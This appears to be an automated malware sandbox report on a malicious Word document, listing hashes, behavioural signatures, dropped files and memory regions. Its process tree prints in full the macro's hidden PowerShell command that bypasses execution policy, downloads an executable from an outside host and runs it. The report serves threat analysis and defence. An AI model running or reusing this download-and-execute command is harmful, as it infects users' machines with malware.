Overview

overview

10

Static

static

8

5607c606b5...4a.doc

windows7-x64

10

5607c606b5...4a.doc

windows10-2004-x64

10

Analysis

  • max time kernel
    133s
  • max time network
    140s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21-11-2024 05:01

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    5607c606b518b92077a4652948b79835b787177836af61f3cd530eea7e63254a.doc

  • Size

    69KB

  • MD5

    2d9d347f7fa64d7b91025e2a12bc11a3

  • SHA1

    29bbc0501fb019c55c57a280d89c18fb74af1777

  • SHA256

    5607c606b518b92077a4652948b79835b787177836af61f3cd530eea7e63254a

  • SHA512

    e4d5eadfda1b58e9181fca515b90a7d92047c0026305b013d03a4066dfb5d3f0b3f1806c987624b19adfd4d776fb152a82fa85d176c8b78341bc132f7e3a3d72

  • SSDEEP

    768:Z45GzFf7SckrjwoLMkk6hc1r8OLoTWnXeJ75yrWj89y/qBj1Ix:Z/Rf7S8oLVkicpLdTrWj1qBBq

Score
10/10
execution

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

    execution
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5607c606b518b92077a4652948b79835b787177836af61f3cd530eea7e63254a.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4680
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c pOwERsHELl -Ex bYpasS -NOp -w hiDdEn inVOKE-WebRequEsT -uri 'https://alexanu.com/vnvnomcry.exe' -ouTfIlE '%ApPdAtA%\vnomt.exe' ; iNVOkE-ITeM '%APPDAtA%\vnomt.exe'
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:3328
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        pOwERsHELl -Ex bYpasS -NOp -w hiDdEn inVOKE-WebRequEsT -uri 'https://alexanu.com/vnvnomcry.exe' -ouTfIlE 'C:\Users\Admin\AppData\Roaming\vnomt.exe' ; iNVOkE-ITeM 'C:\Users\Admin\AppData\Roaming\vnomt.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:5100

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\TCDCC72.tmp\sist02.xsl
    Filesize

    245KB

    MD5

    f883b260a8d67082ea895c14bf56dd56

    SHA1

    7954565c1f243d46ad3b1e2f1baf3281451fc14b

    SHA256

    ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353

    SHA512

    d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jcgjfvyl.avb.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
    Filesize

    2B

    MD5

    f3b25701fe362ec84616a93a45ce9998

    SHA1

    d62636d8caec13f04e28442a0a6fa1afeb024bbb

    SHA256

    b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

    SHA512

    98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

    Download Submit

  • memory/4680-7-0x00007FFDDC8F0000-0x00007FFDDCAE5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4680-18-0x00007FFDDC8F0000-0x00007FFDDCAE5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4680-5-0x00007FFD9C970000-0x00007FFD9C980000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4680-9-0x00007FFDDC8F0000-0x00007FFDDCAE5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4680-10-0x00007FFDDC8F0000-0x00007FFDDCAE5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4680-13-0x00007FFDDC8F0000-0x00007FFDDCAE5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4680-12-0x00007FFDDC8F0000-0x00007FFDDCAE5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4680-14-0x00007FFD9A0E0000-0x00007FFD9A0F0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4680-15-0x00007FFDDC8F0000-0x00007FFDDCAE5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4680-11-0x00007FFDDC8F0000-0x00007FFDDCAE5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4680-8-0x00007FFDDC8F0000-0x00007FFDDCAE5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4680-1-0x00007FFDDC98D000-0x00007FFDDC98E000-memory.dmp

    Filesize

    4KB

    Download

  • memory/4680-6-0x00007FFDDC8F0000-0x00007FFDDCAE5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4680-4-0x00007FFD9C970000-0x00007FFD9C980000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4680-19-0x00007FFDDC8F0000-0x00007FFDDCAE5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4680-20-0x00007FFD9A0E0000-0x00007FFD9A0F0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4680-17-0x00007FFDDC8F0000-0x00007FFDDCAE5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4680-16-0x00007FFDDC8F0000-0x00007FFDDCAE5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4680-56-0x00007FFDDC8F0000-0x00007FFDDCAE5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4680-2-0x00007FFD9C970000-0x00007FFD9C980000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4680-0-0x00007FFD9C970000-0x00007FFD9C980000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4680-3-0x00007FFD9C970000-0x00007FFD9C980000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4680-107-0x00007FFDDC8F0000-0x00007FFDDCAE5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4680-108-0x00007FFDDC98D000-0x00007FFDDC98E000-memory.dmp

    Filesize

    4KB

    Download

  • memory/4680-109-0x00007FFDDC8F0000-0x00007FFDDCAE5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4680-110-0x00007FFDDC8F0000-0x00007FFDDCAE5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4680-116-0x00007FFDDC8F0000-0x00007FFDDCAE5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/5100-93-0x000001D28A960000-0x000001D28A982000-memory.dmp

    Filesize

    136KB

    Download